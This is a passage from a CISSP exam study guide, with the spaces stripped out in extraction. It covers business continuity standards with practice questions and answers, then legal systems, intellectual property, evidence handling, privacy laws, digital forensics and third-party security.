ISO/IEC27031ispartoftheISO27000series,whichalsoincludesISO27001
andISO27002(discussedinChapter1,Domain1:InformationSecurity
GovernanceandRiskManagement).ISO/IEC27031focusesonBCP(DRPis
handledbyanotherframework;seebelow).

FastFacts
Accordingtoh p://www.iso27001security.com/html/27031.html,ISO/IEC
27031isdesignedto:
Provideaframework(methodsandprocesses)foranyorganization
private,governmental,andnongovernmental
Identifyandspecifyallrelevantaspectsincludingperformancecriteria,
design,andimplementationdetails,forimprovingICTreadinessaspartof
theorganizationsISMS,helpingtoensurebusinesscontinuity.
Enableanorganizationtomeasureitscontinuity,securityandhence
readinesstosurviveadisasterinaconsistentandrecognizedmanner.
TermsandacronymsusedbyISO/IEC27031include:
ICTInformationandCommunicationsTechnology

ISMSInformationSecurityManagementSystem
9

ISO/IEC27031InformationtechnologySecuritytechniques

GuidelinesforICTReadinessforBusinessContinuity(nalcommi ee
draft).h p://www.iso27001security.com/html/27031.html[accessedJuly2,
2013].

AseparateISOplanfordisasterrecoveryisISO/IEC24762:2008,Information
technologySecuritytechniquesGuidelinesforinformationand
communicationstechnologydisasterrecoveryservices.Moreinformationis
availableath p://www.iso.org/iso/catalogue_detail.htm?csnumber=41532
BCI

TheBusinessContinuityInstitute(BCI,h p://www.thebci.org/)publisheda
sixstepGoodPracticeGuidelines(GPG)in2008thatdescribestheBusiness
ContinuityManagement(BCM)process:
Section1consistsoftheintroductoryinformationplusBCMPolicyand
ProgrammeManagement.
Section2isUnderstandingtheOrganisation
Section3isDeterminingBCMStrategy
Section4isDevelopingandImplementingBCMResponse
Section5isExercising,Maintaining&ReviewingBCMarrangements
Section6isEmbeddingBCMintheOrganisationsCulture10

Summary of exam objectives

BusinessContinuityandDisasterRecoveryPlanningisacritical,and
frequentlyoverlooked,domain.Itcanbethemostcriticalofalldomainsand
serveasanorganizationslastcontroltopreventfailure.Ofallcontrols,a
failedBCPorDRPcanbemostdevastating,potentiallyresultingin
organizationalfailureorinjuryorlossoflife.

Beyondmitigatingsuchstarkrisks,BusinessContinuityandDisaster
RecoveryPlanninghasevolvedtoprovidetruebusinessvalueto
organizations,evenintheabsenceofdisaster.Theorganizationaldiligence
requiredtobuildacomprehensiveBCP/DRPcanpaymanydividends,
throughthethoroughunderstandingofkeybusinessprocesses,asset
tracking,prudentbackupandrecoverystrategies,andtheuseofstandards.
Mappingrisktokeybusinessprocessescanresultinpreventiveriskmeasures
takeninadvanceofanydisaster,aprocessthatmayavoidfuturedisasters
entirely.

TOP FIVE TOUGHEST QUESTIONS

1.Whichplandetailsthestepsrequiredtorestorenormalbusinessoperations
afterarecoveringfromadisruptiveevent?
A.BusinessContinuityPlanning(BCP)
B.BusinessResumptionPlanning(BRP)
C.ContinuityofOperationsPlan(COOP)
D.OccupantEmergencyPlan(OEP)
2.Whatmetricdescribeshowlongitwilltaketorecoverafailedsystem?
A.MinimumOperatingRequirements(MOR)
B.MeanTimeBetweenFailures(MTBF)
C.TheMeanTimetoRepair(MTTR)
D.RecoveryPointObjective(RPO)
3.Whatmetricdescribesthemomentintimeinwhichdatamustberecovered
andmadeavailabletousersinordertoresumebusinessoperations?
A.MeanTimeBetweenFailures(MTBF)
B.TheMeanTimetoRepair(MTTR)
C.RecoveryPointObjective(RPO)

D.RecoveryTimeObjective(RTO)
4.MaximumTolerableDowntime(MTD)iscomposedofwhichtwometrics?
A.RecoveryPointObjective(RPO)andWorkRecoveryTime(WRT)
B.RecoveryPointObjective(RPO)andMeanTimetoRepair(MTTR)
C.RecoveryTimeObjective(RTO)andWorkRecoveryTime(WRT)
D.RecoveryTimeObjective(RTO)andMeanTimetoRepair(MTTR)
5.Whichdraftbusinesscontinuityguidelineensuresbusinesscontinuityof
theInformationandCommunicationsTechnology(ICT)aspartofthe
organizationsInformationSecurityManagementSystem(ISMS)?
A.BCI
B.BS7799
C.ISO/IEC27031
D.NISTSpecialPublication80034

ANSWERS
1.Correctanswerandexplanation:B.AnswerBiscorrect.Business
ResumptionPlanningdetailsthestepsrequiredtorestorenormalbusiness
operationsafterrecoveringfromadisruptiveevent.
Incorrectanswersandexplanations:A,C,andD.AnswersA,C,andDare
incorrect.BusinessContinuityPlanningdevelopsalongtermplantoensure
thecontinuityofbusinessoperations.TheContinuityofOperationsPlan
describestheproceduresrequiredtomaintainoperationsduringadisaster.
TheOccupantEmergencyPlanprovidestheresponseproceduresfor
occupantsofafacilityintheeventasituationposesathreattothehealthand
safetyofpersonnel,theenvironment,orproperty.
2.Correctanswerandexplanation:C.AnswerCiscorrect.TheMeanTimeto
Repair(MTTR)describeshowlongitwilltaketorecoverafailedsystem.Itis
thebestestimateforreconstitutingtheITsystemsothatbusinesscontinuity
mayoccur.

Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.MinimumOperatingRequirementsdescribetheminimum
environmentalandconnectivityrequirementsinordertooperatecomputer
equipment.MeanTimeBetweenFailuresquantieshowlonganewor
repairedsystemwillrunbeforefailing.TheRecoveryPointObjective(RPO)is
themomentintimeinwhichdatamustberecoveredandmadeavailableto
usersinordertoresumebusinessoperations.
3.Correctanswerandexplanation:C.AnswerCiscorrect.TheRecovery
PointObjective(RPO)isthemomentintimeinwhichdatamustberecovered
andmadeavailabletousersinordertoresumebusinessoperations.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.MeanTimeBetweenFailuresquantieshowlonganeworrepaired
systemwillrunbeforefailing.MeanTimetoRepairdescribeshowlongitwill
taketorecoverafailedsystem.RecoveryTimeObjectivedescribesthe
maximumtimeallowedtorecoverbusinessorITsystems.
4.Correctanswerandexplanation:C.AnswerCiscorrect.TheRecovery
TimeObjective(RTO,thetimeittakestobringafailedsystembackonline)
andWorkRecoveryTime(WRT,thetimerequiredtocongureafailed
system)areusedtocalculatetheMaximumTolerableDowntime.
RTO+WRT=MTD.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.MaximumTolerableDowntimedoesnotdirectlyuseRecovery
PointObjectiveorMeanTimetoRepairasmetrics.
5.Correctanswerandexplanation:C.AnswerCiscorrect.TheISO/IEC27031
guidelineensuresbusinesscontinuityoftheInformationand
CommunicationsTechnology(ICT)aspartoftheorganizationsInformation
SecurityManagementSystem(ISMS).
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.BCIandNISTSpecialPublication80034arebusinesscontinuity
frameworks,butdonotmatchthetermsinthequestion.BS7799isnot
BCP/DRPfocused:itdescribesinformationsecuritymanagementsbest
practices.
11

Swanson,M.,Wohl,A.,Pope,L.,Grance,T.,Hash,J.,Thomas,R.NISTSP

80034ContingencyPlanningGuideforInformationTechnologySystems.

ibid.

ibid.

ibid.

Understandingsecurityriskmanagement:Recoverytimerequirements.

h p://searchsecuritychannel.techtarget.com/generic/0,295582,sid97_gci1268749,00.html
[accessedJuly2,2013].
10

BusinessContinuityManagementGOODPRACTICEGUIDELINES2008.

h p://www.calamityprevention.com/links/GPG_2008[accessedJuly2,2013].

CHAPTER9

Domain 9: Legal, Regulations, Inve

stigations, and Compliance
Abstract
ThischapterreviewsthekeytopicsfoundinDomain9:Legal,Regulations,
Investigations,andCompliance.Importantlegaltopicspresentedinthis
chapterincludemajorlegalsystems,adiscussionofcriminalversuscivillaw,
andintellectualproperty.Digitalforensicsandevidenceastheyrelateto
computercasesarealsodiscussed.Thenalkeyelementofthischapterisa
presentationonethicsand,mostimportantly,adiscussionofthe(ISC)2Code
ofEthics.

KEYWORDS
Civillaw;Criminallaw;Administrativelaw;Religiouslaw;Commonlaw;
Patent;Copyright;Trademark;TradeSecret;Entrapment;Enticement;Due
care;DueDiligence;Hearsay

Exam Objectives in This Chapter

MajorLegalSystems
Criminal,Civil,andAdministrativeLaw
InformationSecurityAspectsofLaw
LegalAspectsofInvestigations
Privacy,ImportantLaws,andRegulations
Forensics

SecurityandThirdParties
Ethics

Introduction
Thischapterwillintroducesomeofthebasicconceptsthatareimportantto
allinformationsecurityprofessionals.Theactualimplementationoflaws
surroundingintellectualproperty,privacy,reasonablesearches,andbreach
notication,tonameafew,willdieramongvariousregionsoftheworld,
buttheimportanceoftheseconceptsisstilluniversal.

MAJOR LEGAL SYSTEMS

Inordertobegintoappreciatecommonlegalconceptsatworkintodays
globaleconomy,anunderstandingofthemajorlegalsystemsisrequired.
Theselegalsystemsprovidetheframeworkthatdetermineshowacountry
developslawspertainingtoinformationsystemsintherstplace.Thethree
majorsystemsoflawarecivil,common,andreligiouslaw.
Civil law (legal system)

Themostcommonofthemajorlegalsystemsiscivillaw,whichmany
countriesthroughouttheworldemploy.Thesystemofcivillawleverages
codiedlawsorstatutestodeterminewhatisconsideredwithinthebounds
oflaw.Thoughalegislativebranchtypicallywieldsthepowertocreatelaws,
therewillstillexistajudicialbranchthatistaskedwithinterpretationofthe
existinglaws.Themostsignicantdierencebetweencivilandcommonlaw
isthat,undercivillaw,judicialprecedentsandparticularcaserulingsdonot
carrytheweighttheydoundercommonlaw.
Common law

CommonlawisthelegalsystemusedintheUnitedStates,Canada,theUnited
Kingdom,andmostformerBritishcolonies,amongothers.Theprimary
distinguishingfeatureofcommonlawisthesignicantemphasison
particularcasesandjudicialprecedentsasdeterminantsoflaws.Though
thereistypicallyalsoalegislativebodytaskedwiththecreationofnew
statutesandlaws,judicialrulingscan,attimes,supersedethoselaws.
Becauseoftheemphasisonjudgesinterpretations,thereissignicant
possibilitythatassocietychangesovertime,sotoocanjudicial

interpretationschangeinkind.
Religious and customary law

Religiouslawservesasthethirdofthemajorlegalsystems.Religiousdoctrine
orinterpretationservesasasourceoflegalunderstandingandstatutes.While
Christianity,Judaism,andHinduismhaveallhadsignicantinuenceon
nationallegalsystems,Islamservesasthemostcommonsourceforreligious
legalsystems.ShariaisanexampleofIslamiclawthatusestheQuranand
Hadithasitsfoundation.
Customarylawreferstothosecustomsorpracticesthataresocommonly
acceptedbyagroupthatthecustomistreatedasalaw.Thesepracticescanbe
latercodiedaslawsinthemoretraditionalsense,buttheemphasison
prevailingacceptanceofagroupisquiteimportantwithrespecttothe
conceptofnegligence,which,inturn,isimportantininformationsecurity.

CRIMINAL, CIVIL, AND ADMINISTRATIVE LAW

Withincommonlaw,therearevariousbranchesoflaws,includingcriminal,
civil,andadministrativelaw.
Criminal law

Criminallawpertainstothoselawswherethevictimcanbeseenassociety
itself.Whileitmightseemoddtoconsidersocietythevictimwhenan
individualismurdered,thegoalofcriminallawistopromoteandmaintain
anorderlyandlawabidingcitizenry.Criminallawcanincludepenaltiesthat
removeanindividualfromsocietybyincarcerationor,insomeextremecases
insomeregions,death.Thegoalsofcriminallawaretodetercrimeandto
punishoenders.
Duetotheseriousnessofpotentiallydeprivingsomeoneofeithertheir
freedomor,inthemostextremecases,hisorherlife,theburdenofproofin
criminalcasesisbeyondanyreasonabledoubt.
Civil law

Inadditiontocivillawbeingamajorlegalsystemintheworld,italsoserves
asatypeoflawwithinthecommonlawlegalsystem.Anotherterm
associatedwithcivillawistortlaw,whichdealswithinjury,looselydened,
thatresultsfromsomeoneviolatingtheirresponsibilitytoprovideadutyof

care.Tortlawistheprimarycomponentofcivillawandisthemost
signicantsourceoflawsuitsseekingnancialdamages.
IntheUnitedStates,theburdenofproofinacriminalcourtisbeyonda
reasonabledoubt,whiletheburdenofproofincivilproceedingsisthe
preponderanceoftheevidence.Preponderancemeansitismorelikelythan
not.Satisfyingtheburdenofproofrequirementofthepreponderanceofthe
evidenceinacivilma erisamucheasiertaskthanmeetingtheburdenof
proofrequirementincriminalproceedings.Themostcommontypesof
nancialdamagesarepresentedinTable9.1.
Table9.1
CommonTypesofFinancialDamages

Financial
Damages
Statutory

Description
Statutorydamagesarethoseprescribedbylaw,which
canbeawardedtothevictimevenifthevictim
incurrednoactuallossorinjury

Compensatory Compensatorydamagesprovidethevictimwitha
financialawardinanefforttocompensateforthe
lossorinjuryincurredasadirectresultofthe
wrongdoing
Punitive

Punitivedamagespunishanindividualororganization.
Thesedamagesaretypicallyawardedtoattemptto
discourageaparticularlyegregiousviolationwhere
thecompensatoryorstatutorydamagesalonewould
notactasadeterrent

Administrative law

Administrativelaworregulatorylawislawenactedbygovernmentagencies.
Theexecutivebranch(derivingfromtheOceofthePresident)enacts
administrativelawintheUnitedStates.Governmentmandatedcompliance

measuresareadministrativelaws.
Theexecutivebranchcancreateadministrativelawwithoutrequiringinput
fromthelegislativebranch,butthelawmuststilloperatewithintheconnes
ofthecivilandcriminalcodeandcanstillcomeunderscrutinybythejudicial
branch.SomeexamplesofadministrativelawareFCCregulations,HIPAA
Securitymandates,FDAregulations,andFAAregulations.

INFORMATION SECURITY ASPECTS OF LAW

Examplesoflegalconceptsaectinginformationsecurityinclude:crimes
beingcommi edoraidedbycomputersystems,a acksonintellectual
property,andinternationalissues.
Computer crime

Oneaspectoftheinteractionofinformationsecurityandthelegalsystemis
thatofcomputercrimes.Applicablecomputercrimelawsvarythroughoutthe
world,accordingtojurisdiction.However,regardlessofregion,some
generalitiesexist.

FastFacts
Computercrimescanbebaseduponthewayinwhichcomputersystems
relatetothewrongdoing:computersystemsastargetsandcomputer
systemsasatooltoperpetratethecrime.
ComputersystemsastargetCrimeswherethecomputersystemsserve
asaprimarytarget,suchas:disruptingonlinecommercebymeansof
DistributedDenialofServicea acks,installingmalwareonsystemsfor
thedistributionofspam,orexploitingvulnerabilityonasystemto
leverageittostoreillegalcontent.
ComputerasatoolCrimeswherethecomputerisacentralcomponent
enablingthecommissionofthecrime.Examplesinclude:stealingtrade
secretsbycompromisingadatabaseserver,leveragingcomputerstosteal
cardholderdatafrompaymentsystems,conductingcomputerbased
reconnaissancetotargetanindividualforinformationdisclosureor
espionage,andusingcomputersystemsforthepurposesofharassment.

International cooperation

Todate,themostsignicantprogresstowardinternationalcooperationin
computercrimepolicyistheCouncilofEuropeConventiononCybercrime.
Inadditiontothetreatybeingsignedandsubsequentlyratiedbyamajority
ofthe47Europeanmembercountries,theUnitedStateshasalsosignedand
ratiedthetreaty.TheprimaryfocusoftheConventiononCybercrimeis
establishingstandardsincybercrimepolicytopromoteinternational
cooperationduringtheinvestigationandprosecutionofcybercrime.
AdditionalinformationontheCouncilofEuropeConventiononCybercrime
canbefoundhere:
h p://conventions.coe.int/Treaty/en/Treaties/Html/185.htm.
Intellectual property

Asopposedtophysicalortangibleproperty,intellectualpropertyrefersto
intangiblepropertythatresultedfromacreativeact.Thepurposeof
intellectualpropertylawistocontroltheuseofintangiblepropertythatcan
oftenbetrivialtoreproduceorabuseoncemadepublicorknown.The
followingintellectualpropertyconceptseectivelycreateanexclusive
monopolyontheiruse.
Trademark

Trademarksareassociatedwithmarketing:thepurposeistoallowforthe
creationofabrandthatdistinguishesthesourceofproductsorservices.A
distinguishingname,logo,symbol,orimagerepresentsthemostcommonly
trademarkeditems.IntheUnitedStates,twodierentsymbolsareusedwith
distinctivemarksthatanindividualororganizationisintendingtoprotect.
ThesuperscriptTMsymbolcanbeusedfreelytoindicateanunregistered
markandisshowninFigure9.1.ThecircledRsymbolisusedwithmarks
thathavebeenformallyregisteredasatrademarkwiththeUSPatentand
TrademarkOceandisshowninFigure9.2.

FIGURE9.1 Trademarksymbol.

FIGURE9.2 Registeredtrademarksymbol.

Patent

Patentsprovideamonopolytothepatentholderontherighttouse,make,or
sellaninventionforaperiodoftimeinexchangeforthepatentholders
makingtheinventionpublic.Duringthelifeofthepatent,thepatentholder
can,throughtheuseofcivillitigation,excludeothersfromleveragingthe
patentedinvention.Obviously,inorderforaninventiontobepatented,it
shouldbenovelandunique.Thelengththatapatentisvalid(thepatent
term)variesthroughouttheworldandalsobythetypeofinventionbeing
patented.Generally,inbothEuropeandtheUnitedStates,thepatenttermis
20yearsfromtheinitiallingdate.
Copyright

Copyrightrepresentsatypeofintellectualpropertythatprotectstheformof
expressioninartistic,musical,orliteraryworksandistypicallydenotedby
thecircledCsymbolasshowninFigure9.3.Thepurposeofcopyrightisto
precludeunauthorizedduplication,distribution,ormodicationofacreative
work.Notethattheformofexpressionisprotectedratherthanthesubject
ma erorideasrepresented.

FIGURE9.3 Copyrightsymbol.

Licenses

Softwarelicensesareacontractbetweenaproviderofsoftwareandthe
consumer.Thoughtherearelicensesthatprovideexplicitpermissionforthe
consumertodovirtuallyanythingwiththesoftware,includingmodifyingit
foruseinanothercommercialproduct,mostcommercialsoftwarelicensing
providesexplicitlimitsontheuseanddistributionofthesoftware.Software
licensessuchasenduserlicenseagreements(EULAs)areanunusualformof
contractbecauseusingthesoftwaretypicallyconstitutescontractual
agreement,eventhoughasmallminorityofusersreadthelengthyEULA.
Trade secrets

Trade secrets

Thenalformofintellectualpropertythatwillbediscussedistheconceptof
tradesecrets.Tradesecretsarebusinessproprietaryinformationthatis
importanttoanorganizationsabilitytocompete.Theorganizationmust
exerciseduecareandduediligenceintheprotectionoftheirtradesecrets.
Someofthemostcommonprotectionmethodsusedarenoncompeteand
nondisclosureagreements(NDA).
Import/export restrictions

Duetothesuccessesofcryptography,manynationshavelimitedtheimport
and/orexportofcryptosystemsandassociatedcryptographichardware.In
somecases,countrieswouldprefertheircitizenstonothaveaccessto
cryptosystemsthattheirintelligenceagenciescannotcrackandtherefore
a empttoimposeimportrestrictionsoncryptographictechnologies.
DuringtheColdWar,CoCom,theCoordinatingCommi eeforMultilateral
ExportControls,wasamultinationalagreementtonotexportcertain
technologies,whichincludedencryption,tomanycommunistcountries.
AftertheColdWar,theWassenaarArrangementbecamethestandardfor
exportcontrols.Thismultinationalagreementwasfarlessrestrictivethanthe
formerCoCom,butdidstillsuggestsignicantrestrictionsontheexportof
cryptographicalgorithmsandtechnologiestocountriesnotincludedinthe
WassenaarArrangement.

LEGAL ASPECTS OF INVESTIGATIONS

Investigationsareacriticalwayinwhichinformationsecurityprofessionals
comeintocontactwiththelaw.Forensicandincidentresponsepersonnel
oftenconductinvestigations,andbothneedtohaveabasicunderstandingof
legalma erstoensurethatthelegalmeritsoftheinvestigationarenot
unintentionallytarnished.Evidence,andtheappropriatemethodfor
handlingevidence,isacriticallegalissuethatallinformationsecurity
professionalsmustunderstand.
Evidence

Evidenceisoneofthemostimportantlegalconceptsforinformationsecurity
professionalstounderstand.Informationsecurityprofessionalsare
commonlyinvolvedininvestigationsandoftenhavetoobtainorhandle
evidenceduringtheinvestigation.

CrunchTime
Realevidenceconsistsoftangibleorphysicalobjects.Aknifeorbloody
glovemightconstituterealevidenceinsometraditionalcriminal
proceedings.Directevidenceistestimonyprovidedbyawitnessregarding
whatthewitnessactuallyexperiencedwithhervesenses.Circumstantial
evidenceisevidencethatservestoestablishthecircumstancesrelatedto
particularpointsorevenotherevidence.Corroborativeevidenceprovides
additionalsupportforafactthatmighthavebeencalledintoquestion.
Hearsayevidenceconstitutessecondhandevidence.Asopposedtodirect
evidence,whichsomeonehaswitnessedwithhervesenses,hearsay
evidenceinvolvesindirectinformation.Secondaryevidenceconsistsof
copiesoforiginaldocumentsandoraldescriptions.Computergenerated
logsanddocumentsmightalsoconstitutesecondaryratherthanbest
evidence.

Best evidence rule

Courtspreferthebestevidencepossible.Originaldocumentsarepreferred
overcopies:conclusivetangibleobjectsarepreferredoveroraltestimony.
Recallthatthevedesirablecriteriaforevidencesuggestthat,where
possible,evidenceshouldbe:relevant,authentic,accurate,complete,and
convincing.Thebestevidenceruleprefersevidencethatmeetsthesecriteria.
Evidence integrity

Evidencemustbereliable.Itiscommonduringforensicandincident
responseinvestigationstoanalyzedigitalmedia.Itiscriticaltomaintainthe
integrityofthedataduringthecourseofitsacquisitionandanalysis.
Checksumscanensurethatnodatachangesoccurredasaresultofthe
acquisitionandanalysis.OnewayhashfunctionssuchasMD5orSHA1are
commonlyusedforthispurpose.Chainofcustodyrequiresthat,onceevidence
isacquired,fulldocumentationregardingwho,what,andwhenandwhere
evidencewashandledbemaintained.
Entrapment and enticement

Entrapmentiswhenlawenforcement,oranagentoflawenforcement,

persuadessomeonetocommitacrimewhenthepersonotherwisehadno
intentiontocommitacrime.Enticementcouldstillinvolveagentsoflaw
enforcementmakingtheconditionsforcommissionofacrimefavorable,but
thedierenceisthatthepersonisdeterminedtohavealreadybrokenalaw
orisintentondoingso.

PRIVACY, IMPORTANT LAWS, AND REGULATIONS

AnentirebookcouldeasilybelledwithdiscussionsofbothUSand
internationallawsthatdirectlyorindirectlypertaintoissuesininformation
security.Thissectionisnotanexhaustivereviewoftheselaws.Instead,only
thoselawsthatarerepresentedonexaminationwillbeincludedinthe
discussion.
Privacy

Oneoftheunfortunatesideeectsoftheexplosionofinformationsystems
overthepastfewdecadesisthelossofprivacy.Asmoreandmoredataabout
individualsisusedandstoredbyinformationsystems,thelikelihoodofthat
databeingeitherinadvertentlydisclosed,soldtoathirdparty,or
intentionallycompromisedbyamaliciousinsiderorthirdpartyincreases.
European Union privacy

TheEuropeanUnionhastakenanaggressiveproprivacystancewhile
balancingtheneedsofbusiness.Commercewouldbeimpactedifmember
nationshaddierentregulationsregardingthecollectionanduseof
personallyidentiableinformation.TheEUDataProtectionDirectiveallows
forthefreeowofinformationwhilestillmaintainingconsistentprotections
ofeachmembernationscitizensdata.

FastFacts
TheprinciplesoftheEUDataProtectionDirectiveare:
Notifyingindividualshowtheirpersonaldataiscollectedandused
Allowingindividualstooptoutofsharingtheirpersonaldatawiththird
parties

Requiringindividualstooptintosharingthemostsensitivepersonal
data
Providingreasonableprotectionsforpersonaldata

OECD privacy guidelines

TheOrganizationforEconomicCooperationandDevelopment(OECD),
thoughoftenconsideredexclusivelyEuropean,consistsof30membernations
fromaroundtheworld.Themembers,inadditiontoprominentEuropean
countries,includesuchcountriesastheUnitedStates,Mexico,Australia,
Japan,andtheCzechRepublic.TheOECDprovidesaforuminwhich
countriescanfocusonissuesthatimpacttheglobaleconomy.TheOECDwill
routinelyissueconsensusrecommendationsthatcanserveasanimpetusto
changecurrentpolicyandlegislationintheOECDmembercountriesand
beyond.
Ingeneral,theOECDrecommendstheunfe eredowofinformation,albeit
withnotablelegitimateexceptionstothefreeinformationow.Themost
importantexceptionstounfe ereddatatransferwereidentiedinthePrivacy
andTransborderFlowsofPersonalData.Fiveyearsaftertheprivacy
guidance,theOECDissuedtheirDeclarationonTransborderDataFlows,
whichfurthersupportedeortstosupportunimpededdataows.
EU-US Safe Harbor

AninterestingaspectoftheEUDataProtectionDirectiveisthatthepersonal
dataofEUcitizensmaynotbetransmi ed,evenwhenpermi edbythe
individual,tocountriesoutsideoftheEUunlessthereceivingcountryis
perceivedbytheEUtoadequatelyprotecttheirdata.Thispresentsa
challengeregardingthesharingofthedatawiththeUnitedStates,whichis
perceivedtohavelessstringentprivacyprotections.Tohelpresolvethis
issue,theUnitedStatesandEuropeanUnioncreatedthesafeharbor
frameworkthatwillgiveUSbasedorganizationsthebenetofauthorized
datasharing.Inordertobepartofthesafeharbor,USorganizationsmust
voluntarilyconsenttodataprivacyprinciplesthatareconsistentwiththeEU
DataProtectionDirective.
US Privacy Act of 1974

Allgovernmentshaveawealthofpersonallyidentiableinformationontheir
citizens.ThePrivacyActof1974wascreatedtocodifyprotectionofUS
citizensdatathatisbeingusedbythefederalgovernment.ThePrivacyAct
denedguidelinesregardinghowUScitizenspersonallyidentiable
informationwouldbeused,collected,anddistributed.Anadditional
protectionwasthatthePrivacyActprovidesindividualswithaccesstothe
databeingmaintainedrelatedtothem,withsomenationalsecurityoriented
exceptions.
US Computer Fraud and Abuse Act

Title18UnitedStatesCodeSection1030,whichismorecommonlyknownas
theComputerFraudandAbuseAct,wasoriginallydraftedin1984butstill
servesasanimportantpieceoflegislationrelatedtotheprosecutionof
computercrimes.Thelawhasbeenamendednumeroustimesmostnotably
bytheUSAPATRIOTAct.
ThegoaloftheComputerFraudandAbuseActwastodevelopameansof
deterringandprosecutingactsthatdamagedfederalinterestcomputers.
Federalinterestcomputerincludesgovernment,criticalinfrastructure,or
nancialprocessingsystems;thedenitionalsoreferencedcomputers
engagingininterstatecommerce.WiththeubiquityofInternetbased
commerce,thisdenitioncanbeusedtojustifyalmostanyInternetconnected
computerasbeingaprotectedcomputer.TheComputerFraudandAbuse
Actcriminalizedactionsinvolvingintentionala acksagainstprotected
computersthatresultedinaggregatedamagesof$5000in1year.
USA PATRIOT Act

TheUSAPATRIOTActof2001waspassedinresponsetothea acksinthe
UnitedStatesthattookplaceonSeptember11,2001.ThefulltitleisUniting
andStrengtheningAmericabyProvidingAppropriateToolsRequiredto
InterceptandObstructTerrorismAct,butitisoftensimplycalledthe
PatriotAct.ThemainthrustofthePatriotActthatappliestoinformation
securityprofessionalsaddresseslessstringentoversightoflawenforcement
regardingdatacollection.Wiretapshavebecomebroaderinscope.Searches
andseizurescanbedonewithoutimmediatenoticationtothepersonwhose
dataorpropertymightbege ingseized.

FORENSICS

Digitalforensicsprovidesaformalapproachtodealingwithinvestigations
andevidencewithspecialconsiderationofthelegalaspectsofthisprocess.
Theforensicprocessmustpreservethecrimesceneandtheevidencein
ordertopreventunintentionallyviolatingtheintegrityofeitherthedataor
thedatasenvironment.Aprimarygoalofforensicsistoprevent
unintentionalmodicationofthesystem.Liveforensicsincludestakingabit
bybit,orbinaryimageofphysicalmemory,gatheringdetailsaboutrunning
processes,andgatheringnetworkconnectiondata.
Forensic media analysis

Inadditiontothevaluabledatagatheredduringtheliveforensiccapture,the
mainsourceofforensicdatatypicallycomesfrombinaryimagesofsecondary
storageandportablestoragedevicessuchasharddiskdrives,USBash
drives,CDs,DVDs,andpossiblyassociatedcellularphonesandmp3players.

FastFacts
Inordertounderstandthedierencebetweenabinaryimageanda
normalbackup,theinvestigatorneedstounderstandthefourtypesof
datathatexist.
Allocatedspaceportionsofadiskpartitionthataremarkedasactively
containingdata.
Unallocatedspaceportionsofadiskpartitionthatdonotcontainactive
data.Thisincludesmemorythathasneverbeenallocatedandpreviously
allocatedmemorythathasbeenmarkedunallocated.Ifaleisdeleted,the
portionsofthediskthatheldthedeletedlearemarkedasunallocated
andavailableforuse.
Slackspacedataisstoredinspecicsizechunksknownasclusters.A
clusteristheminimumsizethatcanbeallocatedbyalesystem.Ifa
particularle,ornalportionofale,doesnotrequiretheuseofthe
entirecluster,thensomeextraspacewillexistwithinthecluster.This
leftoverspaceisknownasslackspace:itmaycontainolddataorcanbe
usedintentionallybya ackerstohideinformation.

Badblocks/clusters/sectorsharddisksroutinelyendupwithsectors
thatcannotbereadduetoaphysicaldefect;thesesectorsaremarkedas
badandwillbeignoredbytheoperatingsystem.A ackerscould
intentionallymarksectorsorclustersasbeingbadinordertohidedata
withinthisportionofthedisk.

Network forensics

Networkforensicsisthestudyofdatainmotion,withspecialfocuson
gatheringevidenceviaaprocessthatwillsupportadmissionintocourt.This
meanstheintegrityofthedataisparamount,asisthelegalityofthecollection
process.Networkforensicsiscloselyrelatedtonetworkintrusiondetection:
thedierenceistheformerislegalfocusedandthela erisoperations
focused.
Embedded device forensics

Oneofthegreatestchallengesfacingtheeldofdigitalforensicsisthe
proliferationofconsumergradeelectronichardwareandembeddeddevices.
Whileforensicinvestigatorshavehaddecadestounderstandanddevelop
toolsandtechniquestoanalyzemagneticdisks,newertechnologiessuchas
SolidStateDrives(SSDs)lackbothforensicunderstandingandforensictools
capableofanalysis.

SECURITY AND THIRD PARTIES

Organizationsareincreasinglyreliantuponthirdpartiestoprovide
signicantandsometimesbusinesscriticalservices.Whileleveraging
externalorganizationsisbynomeansarecentphenomenon,thecriticalityof
theroleandalsothevolumeofservicesandproductsnowtypicallywarrant
specica entionofanorganizationsinformationsecuritydepartment.
Service provider contractual security

Contractsaretheprimarycontrolforensuringsecuritywhendealingwith
thirdpartyorganizationsprovidingservices.Thetremendoussurgein
outsourcing,especiallytheongoingshifttowardcloudservices,hasmade
contractualsecuritymeasuresmuchmoreprominent.Whilecontractual
languagewillvary,thereareseveralcommoncontractsoragreementsthat

areusedwhena emptingtoensuresecuritywhendealingwiththirdparty
organizations.
Service-Level Agreements

AcommonwayofensuringsecurityisthroughtheuseofServiceLevel
AgreementsorSLAs.TheSLAidentieskeyexpectationsthatthevendoris
contractuallyrequiredtomeet.SLAsarewidelyusedforgeneralperformance
expectationsbutareincreasinglyleveragedforsecuritypurposesaswell.
SLAsprimarilyaddressavailability.
Attestation

Informationsecuritya estationinvolveshavingathirdpartyorganization
reviewthepracticesoftheserviceproviderandmakeastatementaboutthe
securitypostureoftheorganization.Thegoaloftheserviceprovideristo
provideevidencethattheyshouldbetrusted.Typically,athirdparty
providesa estationafterperforminganauditoftheserviceprovideragainst
aknownbaseline.
Right to Penetration Test/Right to Audit

TheRighttoPenetrationTestandRighttoAuditdocumentsprovidethe
originatingorganizationwithwri enapprovaltoperformtheirowntesting
orhaveatrustedproviderperformtheassessmentontheirbehalf.Typically,
therewillbelimitationsonwhatthepentestersorauditorsareallowedtouse
ortarget,buttheseshouldbeclearlydenedinadvance.
Vendor governance

Thegoalofvendorgovernanceistoensurethatthebusinessiscontinually
ge ingsucientqualityfromitsthirdpartyproviders.Professionals
performingthisfunctionwilloftenbeemployedatboththeoriginating
organizationandthethirdparty.Ultimately,thegoalistoensurethat
strategicpartnershipsbetweenorganizationscontinuallyprovidethe
expectedvalue.

ETHICS
Ethicsisdoingwhatismorallyright.TheHippocraticOath,takenbydoctors,
isanexampleofacodeofethics.Ethicsisofparamountconcernfor
informationsecurityprofessionals:weareoftentrustedwithhighlysensitive
information,andouremployers,clients,andcustomersmustknowthatwe

willtreattheirinformationethically.
2

The (ISC) Code of Ethics

The(ISC)2CodeofEthicsisthemosttestablecodeofethicsontheexam.
Thatsfair:youcannotbecomeaCISSPwithoutagreeingtotheCodeof
Ethics(amongothersteps);soitisreasonabletoexpectnewCISSPsto
2

understandwhattheyareagreeingto.The(ISC) CodeofEthicsisavailable
